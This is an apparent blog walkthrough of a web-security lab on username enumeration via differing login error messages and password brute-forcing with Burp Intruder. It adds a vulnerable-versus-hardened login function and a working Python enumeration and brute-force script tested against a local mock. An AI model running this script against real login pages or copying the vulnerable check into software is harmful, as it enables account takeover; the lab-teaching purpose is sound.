Username enumeration via different responses

Abdullah Hamza
5 min read · Jul 3, 2024


To access the lab visit the following link:

This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:

Target Goal

To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.

Access the lab

Click on the given button to access the lab

Lab Access button

Lab homepage

As soon as the lab opens we see the following homepage. At the top right there is a “My account” link. Let’s click it to reach the login page.

Lab homepage

Let’s navigate to the login page and log in with dummy credentials. For this example I used the username text and the password test. With Burp Suite we can capture this request and analyze it further.

I am using the browser built into Burp Suite. If you still need guidance on setting up Burp Suite with your own browser to intercept requests, see the detailed write-up here:

logging in with dummy credentials

When we capture the login request in Burp Suite, we can click on it to view its details: the content of the request and the corresponding response in the adjacent panel.

captured request and its response

We can render the captured response. On inspection, it contains an “Invalid username” error message.

This message tells us how the application handles a failed login: it checks whether the username exists before it checks the password, and it reports the two failures differently. That difference is the vulnerability. Nobody needs to know a password to find out which usernames exist; a failed login already says so.

By submitting candidate usernames with any password and watching for a response that does not say “Invalid username”, we can separate valid usernames from invalid ones.
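To make the point concrete, here is the login check written both ways, once with the lab’s behaviour and once hardened so that both failure cases look the same. This is an added example, not the lab’s server code or anything from the original post; the user store, the made-up account alice/letmein and the sha256-based hashing are assumptions chosen to keep the example short.

```python
from __future__ import annotations

import hashlib
import hmac
import os


# Constructed user store for this example: username -> (salt, hash).
# sha256 keeps the snippet short; a real service would use a slow KDF
# such as argon2id, scrypt or bcrypt.
def _hash(salt: bytes, password: str) -> bytes:
    return hashlib.sha256(salt + password.encode()).digest()


_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _hash(_SALT, "letmein"))}  # made-up account

# Dummy record so an unknown username costs the same hashing work as a known one.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash(_DUMMY_SALT, os.urandom(16).hex())


def login_vulnerable(username: str, password: str) -> tuple[int, str]:
    """Lab-style check: the error text depends on whether the username
    exists, so every failed login leaks which usernames are valid."""
    if username not in USERS:
        return 200, "Invalid username"
    salt, stored = USERS[username]
    if _hash(salt, password) != stored:
        return 200, "Incorrect password"
    return 302, "/my-account"


def login_hardened(username: str, password: str) -> tuple[int, str]:
    """Both failure paths return the same status and the same message, and
    both hash the supplied password, so the response no longer tells an
    unknown user apart from a wrong password."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    match = hmac.compare_digest(_hash(salt, password), stored)
    if username in USERS and match:
        return 302, "/my-account"
    return 200, "Invalid username or password"
```

The single generic message is what closes the hole this lab is about. The dummy hash and the constant-time comparison are there so that the fix does not simply move the oracle from the message text to response timing, which is the variant a later lab in the same series covers.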

Brute forcing username

So let’s brute-force the username with Burp Intruder.

  • Right-click on the captured request and select “Send to Intruder” from the context menu.
  • Ensure the attack type is set to “Sniper”. This is the default attack type and it is the right choice when only one parameter is being tested.
  • Go to the Intruder tab and open the “Positions” sub-tab; you’ll see the captured request there.
  • Click on “Clear §” to remove all the automatic payload positions. Highlight the value of the username parameter.
  • Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
Intruder tab
  • Navigate to the “Payloads” sub-tab in Intruder, shown below.
  • In the “Payload Sets” section, make sure “Payload set 1” is selected, corresponding to the position you marked, and set the payload type to “Simple list”.
  • Under “Payload Options”, copy the list of usernames provided on the lab page and click “Paste”.
  • You can also save the list of usernames in a text file and load it by clicking “Load”.
setting payload
  • Once your payloads are configured, click on the “Start attack” button.
  • Burp Suite will start sending requests with each username in your list and display the results in the Intruder tab.

Sorting the results by the Length column, we notice that one response differs in length from all the others. Rendering that response shows “Incorrect password” instead of “Invalid username”. The username sent in that request is therefore valid.

username found

We have identified the correct username. Let’s go back to the Intruder tab.

  • Click on “Clear §” to remove the previous payload position. Replace the value of the username parameter with the username we just identified, so every request in the next attack targets that account.
  • Highlight the value of the password parameter and click on “Add §” to mark it as the payload position. It will be surrounded by § symbols.
Adding payload position to password
  • Copy the list of passwords provided on the lab page and click “Paste” in the payload settings.
  • You can also save the list of passwords in a text file and load it by clicking “Load”.
  • Once your payloads are configured, click on the “Start attack” button.
loading passwords list
  • Burp Suite will start sending requests with each password in your list and display the results in the Intruder tab.
  • Once the attack is complete, you will notice that one request returned a 302 status code while all the others returned 200. The redirect is the application sending a successfully logged-in user to their account page, so the payload in that request is the password.
Identified password

Use the identified username and password to log in. Once successfully logged in, the lab will be marked as solved.
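Both Intruder attacks are simple enough to script, and doing so shows the logic Burp’s Length column hides: compare each response body against the majority, then look for the one status code that differs. The following is an added example, not code from the original post or from PortSwigger. It runs against a local mock that imitates the three responses observed above (so it works offline); the form field names username and password, the /login path and the wordlists and credentials are constructed assumptions for this demo.

```python
from __future__ import annotations

import threading
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the lab's login endpoint: one valid account and the
# three responses the write-up observed. The credentials are made up.
MOCK_USER, MOCK_PASS = "alice", "letmein"


class MockLogin(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if user == MOCK_USER and password == MOCK_PASS:
            self.send_response(302)  # success: redirect to the account page
            self.send_header("Location", "/my-account")
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        msg = b"Invalid username" if user != MOCK_USER else b"Incorrect password"
        body = b"<html><body><p class=is-warning>" + msg + b"</p></body></html>"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_mock() -> str:
    """Start the mock on a free localhost port and return its login URL."""
    server = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}/login"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Do not follow 302s: the redirect itself is the signal we are looking for.
    def redirect_request(self, *args, **kwargs):
        return None


def attempt(url: str, username: str, password: str) -> tuple[int, bytes]:
    """One login POST, i.e. one Intruder request. Returns (status, body)."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    request = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.build_opener(_NoRedirect).open(request) as response:
            return response.status, response.read()
    except urllib.error.HTTPError as err:  # the unfollowed 302 lands here
        return err.code, err.read()


def enumerate_usernames(url: str, usernames: list[str]) -> list[str]:
    """Stage 1 (Sniper on the username): send every candidate with the same wrong
    password; candidates whose response body differs from the majority are valid."""
    bodies = {u: attempt(url, u, "definitely-wrong")[1] for u in usernames}
    baseline = Counter(bodies.values()).most_common(1)[0][0]
    return [u for u, body in bodies.items() if body != baseline]


def brute_force_password(url: str, username: str, passwords: list[str]) -> str | None:
    """Stage 2 (Sniper on the password): the payload that triggers a 302 is the password."""
    for candidate in passwords:
        status, _ = attempt(url, username, candidate)
        if status == 302:
            return candidate
    return None


if __name__ == "__main__":
    login_url = start_mock()
    users = ["admin", "root", "alice", "guest", "test"]  # constructed wordlists
    passwords = ["123456", "password", "qwerty", "letmein"]
    found = enumerate_usernames(login_url, users)
    print("valid usernames:", found)
    for user in found:
        print(user, "->", brute_force_password(login_url, user, passwords))
```

Comparing whole response bodies rather than lengths is slightly more robust than the Length column, since two different messages can happen to be the same size; against a real target with per-response dynamic content (CSRF tokens, timestamps) you would strip that content before comparing. Point the functions at a real URL only on systems you are authorized to test.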

Congratulations! The walkthrough of the first authentication lab ends here.

You can read the walkthrough of the second lab by following this link:



Written by Abdullah Hamza

Developer | CEH | Penetration Tester | Red Team
